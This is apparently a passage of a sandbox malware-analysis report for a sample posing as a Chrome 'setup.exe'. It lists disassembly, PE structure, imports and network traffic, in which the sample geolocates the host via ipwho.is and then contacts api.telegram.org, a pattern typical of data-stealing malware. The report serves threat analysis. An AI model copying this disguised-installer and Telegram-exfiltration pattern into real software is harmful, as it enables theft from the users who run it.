                                                                                                      pop edi
                                                                                                      pop esi
                                                                                                      pop ebx
                                                                                                      mov esp, ebp
                                                                                                      pop ebp
                                                                                                      push ecx
                                                                                                      ret
                                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                                      xor ecx, ebp
                                                                                                      call 00007EFC704FB720h
                                                                                                      jmp 00007EFC704FC232h
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [006FC024h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      push dword ptr [ebp-04h]
                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                      ret
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [006FC024h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                      push dword ptr [ebp-04h]
                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                      ret
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [006FC024h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      mov dword ptr [ebp-10h], esp
                                                                                                      push dword ptr [ebp-04h]
                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], eax

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2fa4540x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x30a0000x2f790.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xb44e980x1cf8
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x33a0000x28bf0.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x29cfc00x70.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x29d0400x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26dd600x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x26c0000x2ec.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2f77c00x280.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x26acb60x26ae00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x26c0000x8f55a0x8f600False0.3128337510897995data4.603339802241448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x2fc0000xd2400x3c00False0.265625data4.76705018766048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x30a0000x2f7900x2f800False0.11476665296052632data5.119981622615319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x33a0000x28bf00x28c00False0.44350316334355827data6.513387981257797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_BITMAP0x30a8e00x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                                                                                                      RT_BITMAP0x30aa200x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                                                                                                      RT_BITMAP0x30b2480x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
                                                                                                      RT_BITMAP0x30faf00xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                                                                                                      RT_BITMAP0x31055c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                                                                                                      RT_BITMAP0x3106b00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                                                                                                      RT_ICON0x310ed80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.07422059518186112
                                                                                                      RT_ICON0x3151000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08703319502074688
                                                                                                      RT_ICON0x3176a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.16463414634146342
                                                                                                      RT_ICON0x3187500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18565573770491803
                                                                                                      RT_ICON0x3190d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3262411347517731
                                                                                                      RT_DIALOG0x3195400xacdataEnglishUnited States0.7151162790697675
                                                                                                      RT_DIALOG0x3195ec0xccdataEnglishUnited States0.6911764705882353
                                                                                                      RT_DIALOG0x3196b80x1b4dataEnglishUnited States0.5458715596330275
                                                                                                      RT_DIALOG0x31986c0x136dataEnglishUnited States0.6064516129032258
                                                                                                      RT_DIALOG0x3199a40x4cdataEnglishUnited States0.8289473684210527
                                                                                                      RT_STRING0x3199f00x234dataEnglishUnited States0.4645390070921986
                                                                                                      RT_STRING0x319c240x182dataEnglishUnited States0.5103626943005182
                                                                                                      RT_STRING0x319da80x50dataEnglishUnited States0.7375
                                                                                                      RT_STRING0x319df80x9adataEnglishUnited States0.37662337662337664
                                                                                                      RT_STRING0x319e940x2f6dataEnglishUnited States0.449868073878628
                                                                                                      RT_STRING0x31a18c0x5c0dataEnglishUnited States0.3498641304347826
                                                                                                      RT_STRING0x31a74c0x434dataEnglishUnited States0.32899628252788105
                                                                                                      RT_STRING0x31ab800x100dataEnglishUnited States0.5703125
                                                                                                      RT_STRING0x31ac800x484dataEnglishUnited States0.39186851211072665
                                                                                                      RT_STRING0x31b1040x1eadataEnglishUnited States0.44081632653061226
                                                                                                      RT_STRING0x31b2f00x18adataEnglishUnited States0.5228426395939086
                                                                                                      RT_STRING0x31b47c0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                                                      RT_STRING0x31b6940x624dataEnglishUnited States0.3575063613231552
                                                                                                      RT_STRING0x31bcb80x660dataEnglishUnited States0.3474264705882353
                                                                                                      RT_STRING0x31c3180x2e2dataEnglishUnited States0.4037940379403794
                                                                                                      RT_GROUP_ICON0x31c5fc0x4cdataEnglishUnited States0.8026315789473685
                                                                                                      RT_VERSION0x31c6480x30cdataEnglishUnited States0.441025641025641
                                                                                                      RT_HTML0x31c9540x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                                                      RT_HTML0x32018c0x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                                                      RT_HTML0x3214a40x8c77HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.08081426068578103
                                                                                                      RT_HTML0x32a11c0x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                                                      RT_HTML0x330bec0x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                                                                                                      RT_HTML0x3312900x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                                                      RT_HTML0x3322dc0x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                                                      RT_HTML0x3338900x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                                                                                                      RT_HTML0x3358ec0x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                                                      RT_MANIFEST0x338f7c0x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllCreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, GetProcessAffinityMask, GetModuleHandleA, GlobalMemoryStatus, ReleaseSemaphore, CreateSemaphoreW

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 7, 2023 16:42:08.608360052 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:08.608422995 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:08.608510017 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:08.634090900 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:08.634121895 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:09.196878910 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:09.197009087 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:09.206342936 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:09.206365108 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:09.206978083 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:09.308157921 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:10.293761969 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:10.335483074 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:10.475994110 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:10.476100922 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:10.476175070 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:10.477096081 CEST49730443192.168.2.7108.181.47.111
                                                                                                      Sep 7, 2023 16:42:10.477134943 CEST44349730108.181.47.111192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.017504930 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.017589092 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.017698050 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.018690109 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.018714905 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.647294044 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.647449017 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.650299072 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.650325060 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.650880098 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.661732912 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.661832094 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662012100 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662054062 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662174940 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662206888 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662296057 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662307978 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662395000 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662420034 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662439108 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662456989 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662499905 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662547112 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662585020 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662605047 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662620068 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662693024 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662704945 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662765980 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662777901 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662878990 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662889004 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.662940979 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.662950993 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.663023949 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.663033962 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.663110971 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.663181067 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.663244009 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.663312912 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.707484961 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.707823992 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.707901955 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.707967043 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.708039045 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.751476049 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.764796972 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.766015053 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.766078949 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.766165972 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.807499886 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.807981014 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.808068037 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.808187008 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.808285952 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.851497889 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:18.851831913 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.851934910 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.852005005 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:18.895495892 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.272537947 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.272716045 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.272836924 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.272883892 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.272943974 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.273200989 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.273302078 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.315483093 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.315762997 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.315840960 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.363497019 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.577958107 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.578108072 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.578171968 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578228951 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.578231096 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578284025 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.578335047 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578351021 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.578445911 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578542948 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578607082 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.578638077 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.619482040 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.619688034 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.619807005 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.667478085 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.856420040 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.856556892 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.856662035 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.856709957 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.856761932 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.856906891 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:19.883907080 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:19.884208918 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:21.094882965 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:21.095031977 CEST44349732149.154.167.220192.168.2.7
                                                                                                      Sep 7, 2023 16:42:21.095117092 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:21.095640898 CEST49732443192.168.2.7149.154.167.220
                                                                                                      Sep 7, 2023 16:42:21.095669031 CEST44349732149.154.167.220192.168.2.7

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 7, 2023 16:42:08.400118113 CEST5937853192.168.2.78.8.8.8
                                                                                                      Sep 7, 2023 16:42:08.603555918 CEST53593788.8.8.8192.168.2.7
                                                                                                      Sep 7, 2023 16:42:17.814579964 CEST5653053192.168.2.78.8.8.8
                                                                                                      Sep 7, 2023 16:42:18.012415886 CEST53565308.8.8.8192.168.2.7

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Sep 7, 2023 16:42:08.400118113 CEST192.168.2.78.8.8.80x2caaStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                                                      Sep 7, 2023 16:42:17.814579964 CEST192.168.2.78.8.8.80x5593Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Sep 7, 2023 16:42:08.603555918 CEST8.8.8.8192.168.2.70x2caaNo error (0)ipwho.is108.181.47.111A (IP address)IN (0x0001)false
                                                                                                      Sep 7, 2023 16:42:18.012415886 CEST8.8.8.8192.168.2.70x5593No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • ipwho.is
                                                                                                      • api.telegram.org

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.749730108.181.47.111443C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2023-09-07 14:42:10 UTC0OUTGET / HTTP/1.1
                                                                                                      accept: */*
                                                                                                      host: ipwho.is
                                                                                                      2023-09-07 14:42:10 UTC0INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 07 Sep 2023 14:42:10 GMT
                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: ipwhois
                                                                                                      Access-Control-Allow-Headers: *
                                                                                                      X-Robots-Tag: noindex
                                                                                                      2023-09-07 14:42:10 UTC0INData Raw: 32 63 38 0d 0a 7b 22 69 70 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 56 22 2c 22 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 36 2e 31 31 34 37 30 37 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 35 2e 31 37 32 38 34 39 37 2c
                                                                                                      Data Ascii: 2c8{"ip":"191.101.61.19","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Nevada","region_code":"NV","city":"Las Vegas","latitude":36.1147074,"longitude":-115.1728497,


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.749732149.154.167.220443C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      TimestampkBytes transferredDirectionData
